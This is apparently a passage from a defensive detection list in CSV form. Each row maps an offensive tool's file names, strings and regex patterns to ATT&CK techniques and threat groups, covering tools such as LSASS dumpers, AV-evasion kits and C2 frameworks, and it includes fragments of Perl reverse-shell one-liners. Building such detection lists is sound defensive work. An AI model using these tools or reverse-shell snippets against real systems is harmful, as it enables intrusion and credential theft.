"*pe2shc.exe *",".{0,1000}pe2shc\.exe\s.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1027 - T1059.004 - T1105 - T1036","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","N/A","10","2521","452","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z","54616"
"*pe2shc.exe*",".{0,1000}pe2shc\.exe.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","54617"
"*pe2shc_*.zip*",".{0,1000}pe2shc_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","54618"
"*Pe2Shellcode.py*",".{0,1000}Pe2Shellcode\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","54619"
"*Peaky-XD/webshell*",".{0,1000}Peaky\-XD\/webshell.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","","","54620"
"*PEASS-ng-master*",".{0,1000}PEASS\-ng\-master.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","54621"
"*PEASS-ng-master.zip*",".{0,1000}PEASS\-ng\-master\.zip.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","54622"
"*peCloak*",".{0,1000}peCloak.{0,1000}","offensive_tool_keyword","peCloak","peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool","T1027.002 - T1059.003 - T1140 - T1562.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py","1","0","N/A","N/A","N/A","2","104","36","2016-03-21T23:38:15Z","2015-08-19T14:46:50Z","54623"
"*PeekNamedPipe(fromPipe*",".{0,1000}PeekNamedPipe\(fromPipe.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","54624"
"*peiga/DumpThatLSASS*",".{0,1000}peiga\/DumpThatLSASS.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","54625"
"*peinject.rb*",".{0,1000}peinject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54626"
"*peinjector.rb*",".{0,1000}peinjector\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54627"
"*PELoader/PeLoader.*",".{0,1000}PELoader\/PeLoader\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","54628"
"*pem2john.py*",".{0,1000}pem2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54629"
"*Pennyw0rth/NetExec*",".{0,1000}Pennyw0rth\/NetExec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","54630"
"*-pentest*",".{0,1000}\-pentest.{0,1000}","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54631"
"*pentest\\sam.hive*",".{0,1000}pentest\\\\sam\.hive.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","54632"
"*pentest\\system.hive*",".{0,1000}pentest\\\\system\.hive.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","54633"
"*PentestBox*",".{0,1000}PentestBox.{0,1000}","offensive_tool_keyword","pentestbox","PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System","T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://pentestbox.org/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54634"
"*PENTESTING-BIBLE*",".{0,1000}PENTESTING\-BIBLE.{0,1000}","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tool","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","N/A","10","13135","2382","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z","54635"
"*pentest-machine*",".{0,1000}pentest\-machine.{0,1000}","offensive_tool_keyword","pentest-machine","Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.","T1583 - T1584 - T1580 - T1582 - T1574","TA0002 - TA0001 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/DanMcInerney/pentest-machine","1","1","N/A","N/A","N/A","4","323","98","2018-09-07T20:01:41Z","2015-02-26T23:57:21Z","54636"
"*pentestmonkey/php-reverse-shell*",".{0,1000}pentestmonkey\/php\-reverse\-shell.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54637"
"*pentestmonkey/pysecdump*",".{0,1000}pentestmonkey\/pysecdump.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","54638"
"*pentestmonkey@pentestmonkey.net*",".{0,1000}pentestmonkey\@pentestmonkey\.net.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#email","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54639"
"*pentest-script-master.zip*",".{0,1000}pentest\-script\-master\.zip.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","1","N/A","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","54640"
"*PE-Obfuscator.exe*",".{0,1000}PE\-Obfuscator\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","54641"
"*PE-Obfuscator.git*",".{0,1000}PE\-Obfuscator\.git.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","54642"
"*PE-Obfuscator-main*",".{0,1000}PE\-Obfuscator\-main.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","54643"
"*Pepitoh/VBad*",".{0,1000}Pepitoh\/VBad.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","54644"
"*peration/registry/getallvaluesregistry*",".{0,1000}peration\/registry\/getallvaluesregistry.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","54645"
"*perfdata.portswigger.net*",".{0,1000}perfdata\.portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","54646"
"*PerfExec.sln*",".{0,1000}PerfExec\.sln.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","54647"
"*PerfExec-main.zip*",".{0,1000}PerfExec\-main\.zip.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","54648"
"*Perform AS-REP roasting*",".{0,1000}Perform\sAS\-REP\sroasting.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","54649"
"*Perform full attack chain. Options are identical to RELAY. Tool must be on disk*",".{0,1000}Perform\sfull\sattack\schain\.\sOptions\sare\sidentical\sto\sRELAY\.\sTool\smust\sbe\son\sdisk.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","54650"
"*Perform password spraying for all active users on a domain*",".{0,1000}Perform\spassword\sspraying\sfor\sall\sactive\susers\son\sa\sdomain.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","54651"
"*perform_privilege_escalation_checks(*",".{0,1000}perform_privilege_escalation_checks\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","54652"
"*Performing attack with current NTLM settings on current user*",".{0,1000}Performing\sattack\swith\scurrent\sNTLM\ssettings\son\scurrent\suser.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#content","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","54653"
"*Performing recursive ShadowSpray attack*",".{0,1000}Performing\srecursive\sShadowSpray\sattack.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","54654"
"*Performs a kerberoasting attack against targeted*",".{0,1000}Performs\sa\skerberoasting\sattack\sagainst\stargeted.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","54655"
"*Perfusion.exe -c*",".{0,1000}Perfusion\.exe\s\-c.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","54656"
"*Perfusion\RegistryPatch.ps1*",".{0,1000}Perfusion\\RegistryPatch\.ps1.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","54657"
"*Perfusion-master.zip*",".{0,1000}Perfusion\-master\.zip.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","54658"
"*PeriscopeCLI.SelectedHost.HostData.RegistryEntries*",".{0,1000}PeriscopeCLI\.SelectedHost\.HostData\.RegistryEntries.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","54659"
"*perl adcsv.pl *",".{0,1000}perl\sadcsv\.pl\s.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike plugin (This reads an ADFIND dump and CSVs it) used by Dispossessor ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Discovery","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54660"
"*perl -e 'use Socket;$*;socket(S,PF_INET,SOCK_STREAM,getprotobyname*",".{0,1000}perl\s\-e\s\'use\sSocket\;\$.{0,1000}\;socket\(S,PF_INET,SOCK_STREAM,getprotobyname.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54661"
"*perl -e 'use Socket;$i=""${lhost}"";$p=${port}*",".{0,1000}perl\s\-e\s\'use\sSocket\;\$i\=\""\$\{lhost\}\""\;\$p\=\$\{port\}.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","54662"
"*perl -MIO -e *new IO::Socket::INET(PeerAddr,""*:*"");STDIN->fdopen(*",".{0,1000}perl\s\-MIO\s\-e\s.{0,1000}new\sIO\:\:Socket\:\:INET\(PeerAddr,\"".{0,1000}\:.{0,1000}\""\)\;STDIN\-\>fdopen\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54663"
"*perl nikto.pl -h*",".{0,1000}perl\snikto\.pl\s\-h.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","54664"
"*perl nipe.pl install*",".{0,1000}perl\snipe\.pl\sinstall.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","54665"
"*perl nipe.pl start*",".{0,1000}perl\snipe\.pl\sstart.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","54666"
"*perl_no_sh_reverse_tcp.py*",".{0,1000}perl_no_sh_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","54667"
"*perl-reverse-shell.*",".{0,1000}perl\-reverse\-shell\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","54668"
"*Permits to backup a DACL before a modification*",".{0,1000}Permits\sto\sbackup\sa\sDACL\sbefore\sa\smodification.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54669"
"*PersAutorun.cs*",".{0,1000}PersAutorun\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","54670"
"*PersCLRInstall.cs*",".{0,1000}PersCLRInstall\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","54671"
